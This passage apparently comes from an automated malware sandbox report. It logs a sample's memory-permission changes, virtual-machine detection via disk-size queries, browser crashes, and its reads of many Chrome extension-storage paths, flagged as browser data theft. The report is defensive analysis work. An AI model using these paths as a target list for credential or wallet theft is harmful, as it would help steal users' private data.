NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7589c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c03000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ca7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x757c9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75522000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75862000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02d00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73662000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:43 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72191000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 region_size: 462848 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02db0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7587c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7589c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7587c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7589c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c03000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ca7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x757c9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75522000 process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (13 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 18, 2024, 10:41 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (13 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 3012 crashed
Application Crash	Process chrome.exe with pid 3032 crashed
Application Crash	Process chrome.exe with pid 2568 crashed
Application Crash	Process firefox.exe with pid 3036 crashed
Application Crash	Process firefox.exe with pid 1864 crashed
Application Crash	Process firefox.exe with pid 3112 crashed
__exception__ Feb. 18, 2024, 10:43 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 102691944 registers.edi: 87112748 registers.eax: 102691944 registers.ebp: 102692024 registers.edx: 37 registers.ebx: 102692308 registers.esi: 2147746133 registers.ecx: 86954048	1	0	0
__exception__ Feb. 18, 2024, 10:43 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x716d540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x716d52ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x717b0ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 71489136 registers.edi: 1953561104 registers.eax: 71489136 registers.ebp: 71489216 registers.edx: 1 registers.ebx: 7804964 registers.esi: 2147746133 registers.ecx: 2629129775	1	0	0
__exception__ Feb. 18, 2024, 10:36 a.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 183626048 registers.r15: 183626488 registers.rcx: 1120 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 78574832 registers.rsp: 183625208 registers.r11: 183629744 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1376 registers.r12: 32290000 registers.rbp: 183625360 registers.rdi: 32289744 registers.rax: 4926976 registers.r13: 183625920	1	0	0
__exception__ Feb. 18, 2024, 10:35 a.m.	stacktrace: 0x5a2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5a2e04 registers.r14: 187625488 registers.r15: 187625928 registers.rcx: 1220 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 88904976 registers.rsp: 187624664 registers.r11: 187629184 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1308 registers.r12: 33207584 registers.rbp: 187624800 registers.rdi: 32944832 registers.rax: 5910016 registers.r13: 187625360	1	0	0
__exception__ Feb. 18, 2024, 10:35 a.m.	stacktrace: 0xcd1f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 10284824 registers.r15: 8791498790512 registers.rcx: 48 registers.rsi: 8791498722176 registers.r10: 0 registers.rbx: 0 registers.rsp: 10284456 registers.r11: 10287840 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 14908864 registers.rbp: 10284576 registers.rdi: 247573344 registers.rax: 13442816 registers.r13: 10285416	1	0	0
__exception__ Feb. 18, 2024, 10:35 a.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 9304720 registers.r15: 9304224 registers.rcx: 48 registers.rsi: 14751584 registers.r10: 0 registers.rbx: 0 registers.rsp: 9303272 registers.r11: 9305472 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 9304055 registers.rbp: 9303392 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0
__exception__ Feb. 18, 2024, 10:35 a.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 8649360 registers.r15: 8648864 registers.rcx: 48 registers.rsi: 14704896 registers.r10: 0 registers.rbx: 0 registers.rsp: 8647912 registers.r11: 8650112 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 8648695 registers.rbp: 8648032 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0

Steals private information from local Internet browsers (50 out of 2383 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Sync Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\flpiciilemghbmfalicajoolhkkenfel\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gojhcdgcpbpfigcaejpfhfegekdgiblk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
